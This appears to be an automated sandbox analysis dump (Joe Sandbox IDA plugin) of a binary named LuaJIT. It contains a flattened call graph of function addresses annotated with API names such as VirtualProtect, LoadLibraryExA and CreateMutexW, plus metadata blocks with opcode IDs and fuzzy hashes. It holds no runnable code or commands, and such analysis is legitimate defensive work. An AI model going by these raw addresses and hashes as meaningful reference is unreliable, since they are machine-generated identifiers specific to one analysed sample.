76598->76600 76601 7ff7b1e00383 76598->76601 76599 7ff7b1e002f8 76599->76585 76618 7ff7b1e32fe0 15 API calls type_info::_name_internal_method 76600->76618 76617 7ff7b1e11a40 15 API calls 2 library calls 76601->76617 76616 7ff7b1e1e9c0 15 API calls 76603->76616 76607 7ff7b1dff2c7 76606->76607 76609 7ff7b1dff2d5 76606->76609 76619 7ff7b1e1e3f0 15 API calls 3 library calls 76607->76619 76609->76592 76611 7ff7b1dfb7a0 type_info::_name_internal_method 15 API calls 76610->76611 76612 7ff7b1dff32a 76611->76612 76612->76592 76613->76591 76614->76592 76615->76599 76616->76599 76617->76599 76618->76599 76619->76609 76620 7ff7b1de4a01 76621 7ff7b1de4a0c 76620->76621 76622 7ff7b1de4a30 76620->76622 76621->76622 76625 7ff7b1df2dc0 76621->76625 76639 7ff7b1e040a0 96 API calls _set_fmode 76622->76639 76626 7ff7b1eaaef8 _set_fmode 14 API calls 76625->76626 76627 7ff7b1df2dd3 GetLastError 76626->76627 76628 7ff7b1df2e77 76627->76628 76630 7ff7b1df2ee6 76628->76630 76640 7ff7b1e03fc0 76628->76640 76635 7ff7b1df2f35 wcsxfrm 76630->76635 76644 7ff7b1df3a80 19 API calls _handle_error 76630->76644 76632 7ff7b1df3074 76633 7ff7b1eaaef8 _set_fmode 14 API calls 76632->76633 76634 7ff7b1df3079 SetLastError 76633->76634 76634->76622 76636 7ff7b1df3005 76635->76636 76645 7ff7b1df3a80 19 API calls _handle_error 76635->76645 76636->76632 76646 7ff7b1df3a80 19 API calls _handle_error 76636->76646 76639->76622 76642 7ff7b1e04020 76640->76642 76641 7ff7b1de3037 _mbsncpy_s 94 API calls 76641->76642 76642->76641 76643 7ff7b1e04089 76642->76643 76643->76630 76644->76635 76645->76636 76646->76632 76647 7ff7b1de21fc 76648 7ff7b1de221f 76647->76648 76653 7ff7b1dff8b0 76648->76653 76650 7ff7b1de3283 76652 7ff7b1de32a9 76650->76652 76669 7ff7b1dffbf0 38 API calls 2 library calls 76650->76669 76654 7ff7b1dff8d7 76653->76654 76655 7ff7b1dffb0b wcsxfrm 76654->76655 76658 7ff7b1dffb09 strrchr 76654->76658 76661 7ff7b1dff8fa wcsxfrm 76654->76661 76657 7ff7b1dffb36 76655->76657 76655->76658 76678 7ff7b1df0a70 
15 API calls 2 library calls 76657->76678 76660 7ff7b1dff941 wcsxfrm 76658->76660 76679 7ff7b1df0950 15 API calls strrchr 76658->76679 76660->76650 76661->76658 76661->76660 76662 7ff7b1dffa0d wcsxfrm 76661->76662 76662->76660 76663 7ff7b1dffa6d 76662->76663 76666 7ff7b1dffa81 76662->76666 76676 7ff7b1df0950 15 API calls strrchr 76663->76676 76665 7ff7b1dffa7f 76670 7ff7b1dfd290 76665->76670 76666->76665 76677 7ff7b1df0950 15 API calls strrchr 76666->76677 76669->76650 76671 7ff7b1dfd2b2 wcsxfrm 76670->76671 76675 7ff7b1dfd321 wcsxfrm 76671->76675 76680 7ff7b1dfe560 76671->76680 76673 7ff7b1dfd30d 76684 7ff7b1dfd720 15 API calls 3 library calls 76673->76684 76675->76660 76676->76665 76677->76665 76678->76660 76679->76660 76681 7ff7b1dfe592 wcsxfrm 76680->76681 76682 7ff7b1dfcaf0 wcsxfrm 15 API calls 76681->76682 76683 7ff7b1dfe691 _handle_error 76682->76683 76683->76673 76684->76675 76685 7ff7b1e27930 76690 7ff7b1defb80 15 API calls 5 library calls 76685->76690 76687 7ff7b1e2794e 76691 7ff7b1eb55c4 76687->76691 76689 7ff7b1e2795d 76690->76687 76719 7ff7b1e91ab8 76691->76719 76694 7ff7b1eb56ea 76725 7ff7b1eb8b34 9 API calls _isindst 76694->76725 76695 7ff7b1eb5608 76696 7ff7b1eb560d 76695->76696 76697 7ff7b1eb562b 76695->76697 76699 7ff7b1eb5621 76696->76699 76722 7ff7b1ec0d88 31 API calls 3 library calls 76696->76722 76697->76699 76703 7ff7b1eaaef8 _set_fmode 14 API calls 76697->76703 76724 7ff7b1eb9294 14 API calls 2 library calls 76699->76724 76705 7ff7b1eb5650 76703->76705 76704 7ff7b1eb5699 _handle_error 76704->76689 76706 7ff7b1eaaef8 _set_fmode 14 API calls 76705->76706 76707 7ff7b1eb5657 76706->76707 76708 7ff7b1eb5673 76707->76708 76709 7ff7b1eb567c 76707->76709 76710 7ff7b1eaaef8 _set_fmode 14 API calls 76708->76710 76711 7ff7b1eaaef8 _set_fmode 14 API calls 76709->76711 76710->76699 76712 7ff7b1eb5681 76711->76712 76713 7ff7b1eb569e 76712->76713 76715 7ff7b1eaaef8 _set_fmode 14 API calls 76712->76715 76714 7ff7b1eaaef8 _set_fmode 14 API calls 76713->76714 
76714->76699 76716 7ff7b1eb568b 76715->76716 76716->76713 76717 7ff7b1eb5690 76716->76717 76723 7ff7b1eb9294 14 API calls 2 library calls 76717->76723 76726 7ff7b1e91748 76719->76726 76721 7ff7b1e91ad2 76721->76694 76721->76695 76722->76699 76723->76704 76724->76704 76758 7ff7b1eb91ac EnterCriticalSection 76726->76758 76728 7ff7b1e91774 76729 7ff7b1e9177c 76728->76729 76732 7ff7b1e9179f 76728->76732 76730 7ff7b1eaaef8 _set_fmode 14 API calls 76729->76730 76731 7ff7b1e91781 76730->76731 76733 7ff7b1eb8b14 _invalid_parameter_noinfo 23 API calls 76731->76733 76734 7ff7b1e9189c 41 API calls 76732->76734 76735 7ff7b1e9178d 76733->76735 76737 7ff7b1e917a7 __CxxCallCatchBlock 76734->76737 76736 7ff7b1eb9200 _isindst LeaveCriticalSection 76735->76736 76738 7ff7b1e91807 76736->76738 76737->76735 76739 7ff7b1e917e3 76737->76739 76740 7ff7b1e917d3 76737->76740 76738->76721 76742 7ff7b1eb8840 __std_exception_copy 23 API calls 76739->76742 76741 7ff7b1eaaef8 _set_fmode 14 API calls 76740->76741 76741->76735 76743 7ff7b1e917f1 76742->76743 76743->76735 76744 7ff7b1e91824 76743->76744 76745 7ff7b1eb8b34 _isindst 9 API calls 76744->76745 76746 7ff7b1e91838 _vswprintf 76745->76746 76747 7ff7b1e9184a 76746->76747 76751 7ff7b1e91874 76746->76751 76748 7ff7b1eaaef8 _set_fmode 14 API calls 76747->76748 76749 7ff7b1e9184f 76748->76749 76750 7ff7b1eb8b14 _invalid_parameter_noinfo 23 API calls 76749->76750 76752 7ff7b1e9185a 76750->76752 76753 7ff7b1eb91ac _isindst EnterCriticalSection 76751->76753 76752->76721 76754 7ff7b1e9187e 76753->76754 76755 7ff7b1e9189c 41 API calls 76754->76755 76756 7ff7b1e91887 76755->76756 76757 7ff7b1eb9200 _isindst LeaveCriticalSection 76756->76757 76757->76752 76759 7ff7b1e056dc 76770 7ff7b1e4b100 76759->76770 76762 7ff7b1e3aa90 16 API calls 76764 7ff7b1e0583b 76762->76764 76763 7ff7b1e0597e 76764->76763 76775 7ff7b1e5ee70 15 API calls 2 library calls 76764->76775 76766 7ff7b1e0589d 76766->76763 76767 7ff7b1dfb7a0 type_info::_name_internal_method 15 API 
calls 76766->76767 76768 7ff7b1e058e9 Concurrency::details::_UnrealizedChore::_CancelViaToken 76767->76768 76776 7ff7b1e5f070 73 API calls _wcsupr_s 76768->76776 76777 7ff7b1e3ab10 76770->76777 76772 7ff7b1e4b138 76773 7ff7b1e3ab10 16 API calls 76772->76773 76774 7ff7b1e05725 76773->76774 76774->76762 76775->76766 76776->76763 76778 7ff7b1e3ab2a 76777->76778 76779 7ff7b1e3ab81 76777->76779 76780 7ff7b1e3ab4e 76778->76780 76781 7ff7b1e3ab3d 76778->76781 76782 7ff7b1e3abd2 76779->76782 76785 7ff7b1e3abbc 76779->76785 76784 7ff7b1e3ade0 VirtualProtect 76780->76784 76783 7ff7b1e3aee0 16 API calls 76781->76783 76788 7ff7b1e3ade0 VirtualProtect 76782->76788 76790 7ff7b1e3ab4c 76783->76790 76786 7ff7b1e3ab67 76784->76786 76787 7ff7b1e3aee0 16 API calls 76785->76787 76786->76790 76793 7ff7b1e3ae40 15 API calls 2 library calls 76786->76793 76787->76790 76791 7ff7b1e3ac1f 76788->76791 76790->76772 76791->76790 76794 7ff7b1e3ae40 15 API calls 2 library calls 76791->76794 76793->76790 76794->76790 76795 7ff7b1de2c6e 76796 7ff7b1de2ca4 76795->76796 76797 7ff7b1de2e9e 76795->76797 76817 7ff7b1e2f900 76796->76817 76829 7ff7b1e30300 76796->76829 76833 7ff7b1e31750 76796->76833 76838 7ff7b1de6950 76796->76838 76878 7ff7b1deaca0 15 API calls 2 library calls 76797->76878 76799 7ff7b1de2ed0 76800 7ff7b1de2cb0 76801 7ff7b1de273d 76800->76801 76804 7ff7b1de2dd7 76800->76804 76806 7ff7b1de3098 76800->76806 76807 7ff7b1de2d98 76800->76807 76801->76801 76801->76806 76879 7ff7b1de2420 17 API calls 2 library calls 76801->76879 76880 7ff7b1deaca0 15 API calls 2 library calls 76801->76880 76802 7ff7b1de4978 76882 7ff7b1e370e0 17 API calls 76802->76882 76805 7ff7b1de5066 76806->76802 76810 7ff7b1de4941 76806->76810 76881 7ff7b1deaca0 15 API calls 2 library calls 76806->76881 76807->76804 76877 7ff7b1deaca0 15 API calls 2 library calls 76807->76877 76818 7ff7b1e2f913 __ExceptionPtrDestroy 76817->76818 76883 7ff7b1e2edf0 76818->76883 76822 7ff7b1e2f94f __ExceptionPtrDestroy 76823 7ff7b1e2f97f 
76822->76823 76824 7ff7b1e2fa1b 76822->76824 76897 7ff7b1e02250 15 API calls 2 library calls 76822->76897 76823->76800 76899 7ff7b1e2f5c0 96 API calls 4 library calls 76824->76899 76827 7ff7b1e2fa05 76898 7ff7b1df0fa0 15 API calls std::rsfun 76827->76898 76830 7ff7b1e30377 76829->76830 76831 7ff7b1e30327 76829->76831 76830->76800 76831->76830 76935 7ff7b1e6ee10 76831->76935 76944 7ff7b1e35910 76833->76944 76835 7ff7b1e31768 76951 7ff7b1e6eda0 76835->76951 76839 7ff7b1de698b 76838->76839 76840 7ff7b1de69a5 76839->76840 76841 7ff7b1de69bd 76839->76841 77025 7ff7b1de51e0 59 API calls _wcsupr_s 76840->77025 76843 7ff7b1de69ed 76841->76843 77026 7ff7b1decb50 15 API calls _free_nolock 76841->77026 76971 7ff7b1df8020 76843->76971 76845 7ff7b1de69d7 77027 7ff7b1ded5e0 76845->77027 76848 7ff7b1de6a06 76984 7ff7b1de5690 76848->76984 76851 7ff7b1de6a4d 76853 7ff7b1de6a77 76851->76853 76864 7ff7b1de69aa 76851->76864 77036 7ff7b1de5500 57 API calls _wcsupr_s 76851->77036 76992 7ff7b1de66b0 76853->76992 76857 7ff7b1de6ace 76858 7ff7b1de6af0 76857->76858 76862 7ff7b1de6b06 _wcsupr_s 76857->76862 76857->76864 77037 7ff7b1de5530 72 API calls 2 library calls 76858->77037 76861 7ff7b1de6afa 77038 7ff7b1de5c10 98 API calls 2 library calls 76861->77038 76862->76864 77039 7ff7b1eaa1fc 76862->77039 76864->76800 76869 7ff7b1de6b54 77056 7ff7b1de5740 117 API calls _wcsupr_s 76869->77056 76870 7ff7b1de6b39 77053 7ff7b1de5500 57 API calls _wcsupr_s 76870->77053 76873 7ff7b1de6b3e 77054 7ff7b1de5530 72 API calls 2 library calls 76873->77054 76875 7ff7b1de6b48 77055 7ff7b1de5c10 98 API calls 2 library calls 76875->77055 76877->76807 76878->76799 76880->76801 76881->76806 76882->76805 76884 7ff7b1e2ee25 76883->76884 76885 7ff7b1e2ee4a 76884->76885 76900 7ff7b1df1310 15 API calls __ExceptionPtrDestroy 76884->76900 76885->76822 76887 7ff7b1e6dc40 76885->76887 76888 7ff7b1e6dc70 76887->76888 76896 7ff7b1e6ddcc _handle_error _mbsncpy_s 76888->76896 76901 7ff7b1e6de50 76888->76901 76890 7ff7b1e6dd15 
76922 7ff7b1de5074 76890->76922 76892 7ff7b1e6dd4a 76893 7ff7b1e6dd81 76892->76893 76925 7ff7b1dfd720 15 API calls 3 library calls 76892->76925 76926 7ff7b1e6e6e0 15 API calls memcpy_s 76893->76926 76896->76822 76897->76827 76898->76824 76899->76823 76900->76885 76902 7ff7b1e6debb __scrt_get_show_window_mode 76901->76902 76908 7ff7b1e6df15 76902->76908 76927 7ff7b1e6da60 15 API calls wcsxfrm 76902->76927 76905 7ff7b1e6e391 76933 7ff7b1e60960 17 API calls memcpy_s 76905->76933 76906 7ff7b1e6e64c 76910 7ff7b1e6e665 76906->76910 76934 7ff7b1df1010 15 API calls std::rsfun 76906->76934 76907 7ff7b1e6e18f 76911 7ff7b1e6e212 76907->76911 76916 7ff7b1e6e1af 76907->76916 76928 7ff7b1df1010 15 API calls std::rsfun 76907->76928 76908->76906 76908->76907 76919 7ff7b1e6df1c 76908->76919 76910->76890 76929 7ff7b1e6dac0 15 API calls 76911->76929 76915 7ff7b1e6e513 76915->76890 76917 7ff7b1e6e30d 76916->76917 76916->76919 76920 7ff7b1e6e2c8 76916->76920 76917->76919 76931 7ff7b1e6da60 15 API calls wcsxfrm 76917->76931 76919->76905 76932 7ff7b1df1010 15 API calls std::rsfun 76919->76932 76920->76919 76930 7ff7b1e6da60 15 API calls wcsxfrm 76920->76930 76923 7ff7b1de508b CreateMutexW 76922->76923 76923->76892 76925->76893 76926->76896 76927->76908 76928->76911 76929->76916 76930->76919 76931->76919 76932->76905 76933->76915 76934->76910 76938 7ff7b1e6f080 76935->76938 76939 7ff7b1e6f0ed 76938->76939 76943 7ff7b1e6f094 76938->76943 76940 7ff7b1e6f0f8 FreeLibrary 76939->76940 76941 7ff7b1e6ee23 76939->76941 76940->76941 76941->76830 76942 7ff7b1e6f0cb FreeLibrary 76942->76943 76943->76941 76943->76942 76945 7ff7b1e359af 76944->76945 76946 7ff7b1e35945 76944->76946 76957 7ff7b1df1310 15 API calls __ExceptionPtrDestroy 76945->76957 76946->76945 76948 7ff7b1e35956 __ExceptionPtrDestroy 76946->76948 76949 7ff7b1e35980 76946->76949 76948->76835 76956 7ff7b1e12a30 15 API calls type_info::_name_internal_method 76949->76956 76958 7ff7b1e6f000 GetLastError 76951->76958 76953 7ff7b1e6edd3 76964 
7ff7b1e6f340 15 API calls 2 library calls 76953->76964 76955 7ff7b1e317e7 76955->76800 76956->76948 76957->76948 76965 7ff7b1e6efa0 76958->76965 76961 7ff7b1e6f05d SetLastError 76961->76953 76962 7ff7b1e6f047 76969 7ff7b1e6ee80 25 API calls 2 library calls 76962->76969 76964->76955 76966 7ff7b1e6efb8 76965->76966 76967 7ff7b1e6efd2 LoadLibraryExA 76966->76967 76970 7ff7b1e13010 15 API calls std::rsfun 76966->76970 76967->76961 76967->76962 76969->76961 76970->76967 76983 7ff7b1df8037 76971->76983 76972 7ff7b1df808d 77057 7ff7b1df4b70 76972->77057 76976 7ff7b1df8100 76978 7ff7b1deb4e0 wcsxfrm 15 API calls 76976->76978 76977 7ff7b1deca10 task 15 API calls 76980 7ff7b1df80a9 76977->76980 76981 7ff7b1df810f 76978->76981 76980->76976 76980->76977 76982 7ff7b1ded5e0 wcsxfrm 15 API calls 76980->76982 76981->76848 76982->76980 76983->76972 77068 7ff7b1deca10 76983->77068 77074 7ff7b1dec860 15 API calls 3 library calls 76983->77074 77075 7ff7b1dedce0 15 API calls strrchr 76983->77075 76985 7ff7b1ded0c0 wcsxfrm 15 API calls 76984->76985 76986 7ff7b1de56c5 76985->76986 76987 7ff7b1de571b 76986->76987 77115 7ff7b1dec860 15 API calls 3 library calls 76986->77115 77116 7ff7b1ded7d0 15 API calls 2 library calls 76986->77116 76989 7ff7b1ded5e0 wcsxfrm 15 API calls 76987->76989 76990 7ff7b1de5731 76989->76990 76990->76851 77035 7ff7b1de68d0 117 API calls 76990->77035 76993 7ff7b1de66cd 76992->76993 76994 7ff7b1de6872 76993->76994 76995 7ff7b1de6722 76993->76995 77002 7ff7b1de6746 76993->77002 77120 7ff7b1de6230 75 API calls wcsxfrm 76994->77120 76996 7ff7b1de689e 76995->76996 76997 7ff7b1de672d 76995->76997 77121 7ff7b1de62c0 75 API calls 2 library calls 76996->77121 77000 7ff7b1de6734 76997->77000 77001 7ff7b1de674b 76997->77001 77003 7ff7b1de6816 77000->77003 77004 7ff7b1de673f 77000->77004 77117 7ff7b1de57b0 98 API calls 2 library calls 77001->77117 77002->76857 77002->76864 77008 7ff7b1de5d60 77002->77008 77119 7ff7b1de60e0 75 API calls 3 library calls 77003->77119 77004->77002 
77118 7ff7b1de5840 77 API calls 2 library calls 77004->77118 77010 7ff7b1de5d96 77008->77010 77122 7ff7b1df3f90 77010->77122 77012 7ff7b1de5e96 77014 7ff7b1de5300 75 API calls 77012->77014 77016 7ff7b1de5ea8 77014->77016 77015 7ff7b1de5e01 wcsxfrm 77017 7ff7b1de5e76 77015->77017 77018 7ff7b1de5e15 wcsxfrm 77015->77018 77016->76857 77019 7ff7b1deb4e0 wcsxfrm 15 API calls 77017->77019 77022 7ff7b1de5e49 77018->77022 77145 7ff7b1decfa0 15 API calls 3 library calls 77018->77145 77024 7ff7b1de5e58 wcsxfrm 77019->77024 77023 7ff7b1deb4e0 wcsxfrm 15 API calls 77022->77023 77023->77024 77135 7ff7b1de5430 77024->77135 77025->76864 77026->76845 77028 7ff7b1ded600 wcsxfrm _free_nolock 77027->77028 77029 7ff7b1dfb7a0 type_info::_name_internal_method 15 API calls 77028->77029 77030 7ff7b1ded621 _free_nolock 77029->77030 77031 7ff7b1dff8b0 wcsxfrm 15 API calls 77030->77031 77032 7ff7b1ded647 task 77031->77032 77034 7ff7b1ded654 task 77032->77034 77397 7ff7b1de2420 15 API calls strrchr 77032->77397 77034->76843 77035->76851 77036->76853 77037->76861 77038->76864 77040 7ff7b1eaa205 77039->77040 77041 7ff7b1de6b2e 77039->77041 77042 7ff7b1eaaef8 _set_fmode 14 API calls 77040->77042 77045 7ff7b1eaa548 77041->77045 77043 7ff7b1eaa20a 77042->77043 77398 7ff7b1eb8b14 23 API calls _invalid_parameter_noinfo 77043->77398 77046 7ff7b1eaa551 77045->77046 77047 7ff7b1eaa55e 77045->77047 77048 7ff7b1eaaef8 _set_fmode 14 API calls 77046->77048 77049 7ff7b1de6b35 77047->77049 77050 7ff7b1eaaef8 _set_fmode 14 API calls 77047->77050 77048->77049 77049->76869 77049->76870 77051 7ff7b1eaa595 77050->77051 77399 7ff7b1eb8b14 23 API calls _invalid_parameter_noinfo 77051->77399 77053->76873 77054->76875 77055->76864 77056->76864 77076 7ff7b1deb5f0 77057->77076 77059 7ff7b1deb4e0 wcsxfrm 15 API calls 77066 7ff7b1df4b95 wcsxfrm __ExceptionPtrDestroy _free_nolock 77059->77066 77060 7ff7b1df4ca8 77061 7ff7b1deb4e0 wcsxfrm 15 API calls 77060->77061 77062 7ff7b1df4cb7 77061->77062 77062->76980 77064 
7ff7b1dec7a0 15 API calls wcsxfrm 77064->77066 77065 7ff7b1deb5f0 wcsxfrm 15 API calls 77065->77066 77066->77059 77066->77060 77066->77062 77066->77064 77066->77065 77080 7ff7b1ded0c0 77066->77080 77086 7ff7b1ded4e0 15 API calls 3 library calls 77066->77086 77069 7ff7b1deca3f task _mbsncpy_s 77068->77069 77111 7ff7b1dfea50 77069->77111 77071 7ff7b1deca64 task 77072 7ff7b1decb36 77071->77072 77114 7ff7b1dead60 15 API calls _free_nolock 77071->77114 77072->76983 77074->76983 77075->76983 77077 7ff7b1deb60b wcsxfrm task 77076->77077 77078 7ff7b1deb65b 77077->77078 77087 7ff7b1dead60 15 API calls _free_nolock 77077->77087 77078->77066 77081 7ff7b1ded0ee _mbsncpy_s 77080->77081 77088 7ff7b1dfc600 77081->77088 77083 7ff7b1ded10b wcsxfrm 77084 7ff7b1ded15b 77083->77084 77092 7ff7b1dead60 15 API calls _free_nolock 77083->77092 77084->77066 77086->77066 77087->77078 77089 7ff7b1dfc619 wcsxfrm 77088->77089 77093 7ff7b1dfc5a0 77089->77093 77091 7ff7b1dfc67d 77091->77083 77092->77084 77096 7ff7b1dfdff0 77093->77096 77095 7ff7b1dfc5c5 wcsxfrm 77095->77091 77097 7ff7b1dfe00d 77096->77097 77098 7ff7b1dfe0cc 77096->77098 77097->77098 77100 7ff7b1dfe023 77097->77100 77099 7ff7b1df8da0 wcsxfrm 15 API calls 77098->77099 77101 7ff7b1dfe0db 77099->77101 77102 7ff7b1df8da0 wcsxfrm 15 API calls 77100->77102 77103 7ff7b1dfe17d 77101->77103 77104 7ff7b1dfe03c 77101->77104 77109 7ff7b1df0950 15 API calls strrchr 77101->77109 77102->77104 77107 7ff7b1df8d00 _free_nolock 15 API calls 77103->77107 77105 7ff7b1dfe1c7 77104->77105 77110 7ff7b1dfde50 15 API calls 2 library calls 77104->77110 77105->77095 77107->77104 77109->77103 77110->77105 77112 7ff7b1df8da0 wcsxfrm 15 API calls 77111->77112 77113 7ff7b1dfea7b 77112->77113 77113->77071 77114->77072 77115->76986 77116->76986 77117->77002 77118->77002 77119->77002 77120->77002 77121->77002 77146 7ff7b1df4050 77122->77146 77124 7ff7b1de5dd4 77124->77012 77125 7ff7b1decde0 77124->77125 77126 7ff7b1dece00 wcsxfrm _free_nolock 77125->77126 77127 
7ff7b1dfb7a0 type_info::_name_internal_method 15 API calls 77126->77127 77128 7ff7b1dece21 _free_nolock 77127->77128 77363 7ff7b1dff6e0 77128->77363 77130 7ff7b1dece47 77133 7ff7b1dece8a task 77130->77133 77370 7ff7b1de2420 15 API calls strrchr 77130->77370 77132 7ff7b1decf04 77132->77015 77133->77132 77371 7ff7b1dead60 15 API calls _free_nolock 77133->77371 77136 7ff7b1de544c 77135->77136 77137 7ff7b1deca10 task 15 API calls 77136->77137 77138 7ff7b1de5468 wcsxfrm 77137->77138 77374 7ff7b1eaa97c 77138->77374 77143 7ff7b1eaa97c 17 API calls 77144 7ff7b1de54c8 wcsxfrm 77143->77144 77144->77012 77145->77018 77147 7ff7b1df4083 77146->77147 77150 7ff7b1df40f5 _wcsupr_s 77146->77150 77174 7ff7b1eab114 77147->77174 77193 7ff7b1df3e80 77150->77193 77151 7ff7b1df40a4 77155 7ff7b1eaaef8 _set_fmode 14 API calls 77151->77155 77152 7ff7b1df40d9 77219 7ff7b1dec990 15 API calls 2 library calls 77152->77219 77157 7ff7b1df40a9 77155->77157 77156 7ff7b1df413f 77199 7ff7b1eab02c 77156->77199 77217 7ff7b1eab448 23 API calls 4 library calls 77157->77217 77161 7ff7b1df40b0 77218 7ff7b1dec990 15 API calls 2 library calls 77161->77218 77162 7ff7b1df4155 77165 7ff7b1eaaef8 _set_fmode 14 API calls 77162->77165 77164 7ff7b1df41e3 _wcsupr_s 77168 7ff7b1df40cf _handle_error 77164->77168 77205 7ff7b1eaaf9c 77164->77205 77167 7ff7b1df419e 77165->77167 77220 7ff7b1eab448 23 API calls 4 library calls 77167->77220 77168->77124 77170 7ff7b1df41a5 77221 7ff7b1dec990 15 API calls 2 library calls 77170->77221 77172 7ff7b1df41c7 77172->77168 77173 7ff7b1eaaf9c _wcsupr_s 57 API calls 77172->77173 77173->77168 77175 7ff7b1eab058 77174->77175 77176 7ff7b1eab075 77175->77176 77179 7ff7b1eab0a1 77175->77179 77177 7ff7b1eaaef8 _set_fmode 14 API calls 77176->77177 77178 7ff7b1eab07a 77177->77178 77234 7ff7b1eb8b14 23 API calls _invalid_parameter_noinfo 77178->77234 77181 7ff7b1eab0a6 77179->77181 77182 7ff7b1eab0b3 77179->77182 77183 7ff7b1eaaef8 _set_fmode 14 API calls 77181->77183 77222 7ff7b1ebd698 
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 59578552-0
                                                      • Opcode ID: d7a9869b5436ec8d6cd8c1598a24097234ef9bd1e157571d7b699d03ddd951d2
                                                      • Instruction ID: 096e6e6c7bed89bf0e430d5a58f546af2901d262870833d79d78cf06b16626e0
                                                      • Opcode Fuzzy Hash: d7a9869b5436ec8d6cd8c1598a24097234ef9bd1e157571d7b699d03ddd951d2
                                                      • Instruction Fuzzy Hash: 9BE04620E1C54381F758B66E28860BD90806F6B72AFE00335F32E81BCACDDC21928632
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                      • String ID:
                                                      • API String ID: 1330151763-0
                                                      • Opcode ID: 9c6babcf131964b4a709adb186eeeb7abad8bdca1f25803fa6700e53adfe3286
                                                      • Instruction ID: 32f0b92b64fb3f996d3dcfcdc0431d3205475518ba761ab72d1048cc8a298733
                                                      • Opcode Fuzzy Hash: 9c6babcf131964b4a709adb186eeeb7abad8bdca1f25803fa6700e53adfe3286
                                                      • Instruction Fuzzy Hash: 98C1A237B24A42C5EB10DF6CC4902AC7761FBAAB99B944225EF2E97798CF78D451C310
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: fed177e880270391593b347b1ec8381c866ee3668e23bdf448b2c5c867d7794d
                                                      • Instruction ID: 5863806ee258a1604af3e9d27389d1a6929b84c59bd6106b8c7dea0fddbca69e
                                                      • Opcode Fuzzy Hash: fed177e880270391593b347b1ec8381c866ee3668e23bdf448b2c5c867d7794d
                                                      • Instruction Fuzzy Hash: 72C1D822A1C78645E761AB19908027EAB51FFA3B8AFC44231FB4D07799DEFCE455C720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: strrchr
                                                      • String ID: d
                                                      • API String ID: 3418686817-2564639436
